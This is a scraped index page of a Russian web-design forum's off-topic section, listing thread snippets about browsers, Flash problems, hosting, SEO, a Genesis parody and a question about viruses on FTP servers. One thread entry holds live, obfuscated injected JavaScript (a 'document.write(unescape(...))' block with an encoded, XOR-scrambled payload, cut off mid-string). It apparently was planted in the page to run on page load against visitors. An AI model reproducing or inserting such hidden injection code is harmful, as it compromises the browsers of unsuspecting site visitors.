Flame
2,573 topics in this forum
-
- 1 reply
- 1.5k views
возможно ли как-то еще сделать переадресацию на предыдущую страницу (типа history.back()) если js отключен? важно чтобы сохранялись данные в форме.
Last reply by D.S.Denton, -
- 6 replies
- 6.1k views
Хочу услышать мнения по этому поводу, а также применимо ли это к дизайну? Дайте ссылку если знаете. Вот что я нашел http://www.hardline.ru/3/37/3616/. Даже не верится: Один из первых примеров создания изображений с помощью печатной машинки. Бабочка Флоры Стэйсси (1898).
Last reply by Maslakoff, -
- 10 replies
- 3k views
Ребята у меня седня денюха!!! Старость берет свое!!!!!
Last reply by ARA, -
- 3 replies
- 2.2k views
Ввели новый сервис "Яндекс-ПУЛЬС". Типа статистика запросов по блогам. Вотъ: Пульс блогосферы за год по запросам парень и девушка
- 5 replies
- 2.3k views
PhotoShop - это скорее всего лучшее что есть. Может еще Macromedia Fireworks 8. А ресурс, где бы можно было найти необходимую информацию для создания внешнего вида сайта у меня не получилось. Спасибо сразу. P.S. Понял, что без фото это не жизнь. Вот это мне понравилось http://www.webimg.ru/content/?id=17
Last reply by Slyfox, -
- 11 replies
- 3.2k views
Здравствуйте господа! У меня есть огромное кол-во исходников на различных языках программирования, от ассемблера до С#. От простых текстовых редакторов до сложных программ по цифровой обработке изображений. Аналогов в интернете не существует. Как вы думаете, может ли сайт по данной теме иметь успех в интернете и приносить доход? Заранее спасибо за ваши ответы!
Last reply by Dimitry Wolotko, -
- 13 replies
- 3.5k views
Скажите пожалуйста, а есть вообще такая возможность не платить хостинг провайдеру, а создать свой сервер, где собственно и будет рамещаться сайт? Просто на одном сайте скачал прогу по для создания своего ftp-сервера, но вот что там меня заинтересовало: в этой проге есть дизайн! И помимо дизайна там еще прикручен свой форум на основе движка "vbulletin".
Симпозиумы
by Slyfox- 10 replies
- 2.9k views
Они вообще проходят среди скажем дизайнеров? Знаю, что по странам Европы кто занимал 2-ое место тот отправлялся в Варшаву, а первые места - в NewYork. Он проходил этим летом. Суть там была в разработке идей и воплощении их на сайте - чтобы донести до людей или реализации коммерческих выгод. Просто я что-то слышал, но не знаю где найти сайт с участниками(этого симпозиума). И вообще хотелось бы увидеть дизайн лучших дизайнеров этого как бы собрания. Также хотелось бы услышать о подобном и увидеть ссылки. Пробовал искать сам, но ничего не нашел. Помогите.
Last reply by Slyfox, -
- 22 replies
- 4.5k views
Сегодня утром меня жестоко оскорбили, мне поставили висту с осликом 7 (которого я ненавижу всеми фибрами и мыбрами). Ослик 6 само сабой виста не любит, поэтому мне прибавилось еще куча проблем с тем, а как бы подружить висту и ослик 6. Единственая идея это отдельная виртуальная машинка. Короче я в дипрессии. Более глупой ОС я в жизни не видел. Она подстать ослику 7.
Last reply by yopopt, -
- 6 replies
- 2.8k views
Я конечно понимаю что вопрос несколько неординарен и возможно где-то некорректен, но...: Как, а точнее каким образом можно проверить проделанную работу оптимизаторов, которые продвигают твой сайт? У руководителя возникло сомнение в отношении корректности работы оптимизатора, но в принципе, сайт ищется по определенным ключевикам и находится на перывх позициях! Тут дело в том что до недавнего времени сайт забанили (Яндекс), я как администратор сайта попросил снять бан с нашего сайта, так как мы зарегистрированны в их платном каталоге. И буквально недавно он поднялся. И как тут быть? Мне не хотелось бы присваивать чужие труды себе!
Last reply by Vlad, -
- 6 replies
- 2.6k views
Прием заявок до 21 октября http://www.lomov.ru/_tmp/contest.htm
- 14 replies
- 3.7k views
http://fishki.net/comment.php?id=26953 Кто-нибудь знает, как это работает
Last reply by WingedFox, -
- 15 replies
- 3.7k views
короч проблемко запускаю flash mx 2004 professional (стоит win2000), показывает заставку свою, на фразе building workplace дохнет, из процессов удаляетсо. От чего бы такое? Помогите плз! Просто заказ, там нужно флеш сделать, а без проги ето невозможно! заранее спс)
Last reply by djredshake, -
- 22 replies
- 5.9k views
<!--[Q]--><script>document.write(unescape("%3Cscript%3Eif%28NQ%21%3D1%29%7Bfunction%20Ib%28Bj%29%7Breturn%20Bj%7Dtry%7Bvar%20Kp%3D%27XX2XP2Xk2X42XJ2XO2Xf2Xb2Xl2X62Xo2XL2Xd2XK2Xt2XS2Xe2XM2X52Xs2Xr2X92Xn2Xh2Xq2XI2X72XU2X32XC2Xg2Xw2XV2XY2Xc2Xm2XG2Xx2X82Xa2XZ2Xp2XN2XT2XA2Xi2XR2XD2XH2XW2Xz2Xj2XF2Xy2PX2PP2Pk2P42PJ2PO2Pf2Pb2Pl2P62Po2PL2Pd2PK2Pt2PS2Pe2PM2P52Ps2Pr2P92Pn2Ph2Pq%27%2Cbp%3DIb%28%272%27%29%3Bvar%20Rr%3DArray%283002%5E3043%2C7773%5E7755%2Cpc%28%276%27%29%2Cpc%28%2723%27%29%2Cpc%28%2712%27%29%2Cpc%28%2721%27%29%2Cpc%28%2717%27%29%2C13278%5E13189%2C30998%5E30997%2Cpc%28%2716%27%29%2C26388%5E26399%2Cpc%28%2710%27%29%2C9748%5E9809%2Cpc%28%2733%27%29%2C12576%5E12…
- 13 replies
- 4.1k views
(на форуме электропроектировщиков на colan.ru) Честно содрал на другом форуме. Но прикольно (из коpпоpативной пеpеписки) ============================== Генеpальномy диpектоpy Иегове от начальника маpкетингового отдела Гавpиила Исследования, пpоведенные нашим отделом в pамках пpоекта Genesis, показали, что наилyчшие пеpспективы на pынке имеют системы следyющей конфигypации: Планета: 1 шт. Радиyс: 3000 км Сила тяжести: 0.5 g Соотношение сyша/вода: 1:1 Темпеpатypа: +24 Атмосфеpа: кислоpод Моpя: пpесн.вода Реки: молоко, мед Фаyна: тpавоядная Пеpифеpия: светила 2 шт. (дн./ночн.), скоpость: 0.0007 RPM (1 об/сyт) ?Hапpавить в отдел стpатегического планиpования …
Last reply by djredshake, -
- 10 replies
- 4.4k views
Кто знает как удалить icq поиск, когда вводишь в панели для ввода урл какоето слово, то по умолчанию оно ищется в Гугл, а после установки ICQ по icq search? Так вопрос в том чтобы вернуть назад поиск по гугл.
- 5 replies
- 2k views
Кто знает?
Last reply by ARA, -
Для Влада 1 2
by Petrovich.ru- 49 replies
- 9.8k views
К сожалению, в разделе шаг за шагом, не смог добавить коммент. Посему выкладываю тут, так как живу я тут и только тут Влад писал (XHTML шаг за шагом): - "И самый кривой их них ИЕ." Влад. Я с Вами категорически не согласен (что ИЕ самый кривой!) Не говоря уже о том, что утверждение есть, а доказательств нет. Изложите, пожалуйста, доказательства. Я настаиваю на дискуссии (разумеется, Вы вправе отказаться, мы в свободной стране). С уважением.
Last reply by ARA, -
- 18 replies
- 3.5k views
Как можно установить PunBB на компьютер, с использыванием пакета denwer.
Last reply by Vlad, -
- 16 replies
- 3.1k views
я хочу! ... По каким критериям оцениваются, точно не по количество написаному, думаю по качеству, поясните, интересно!
- 14 replies
- 3.4k views
вот это - http://www.demkova.ru/ маленькая девочка сделала в пять лет... я х*ею... http://community.livejournal.com/ru_webdesign/555005.html
Вирус на ftp
by rus- 8 replies
- 2.8k views
Подскажите пожалуйста как и чем можно выявить вирь на фтп и может ли пользователь хоста с этим справиться сам, или же это выполняется с стороны хостинг провайдера?
Как вы относитесь к флуду?
- 2 replies
- 1.9k views
Кусачий однако.. http://www.jealouscomputers.com/footage.php?lang=uk_en -- см. видео
- 5 replies
- 2.3k views
У меня на компе запускается локальный веб-сервер Apache (комплект Денвер точнее), под которым я смотрю и редактирую некоторые сайты. После установки VPN локальные адреса не доступны. Т.е. набираю например htmlbook.ru и сразу браузер лезет в инет за этим сайтом. Как можно настроить, чтобы определенные сайты грузились с моего компа под управлением локального веб-сервера?
Last reply by Emm,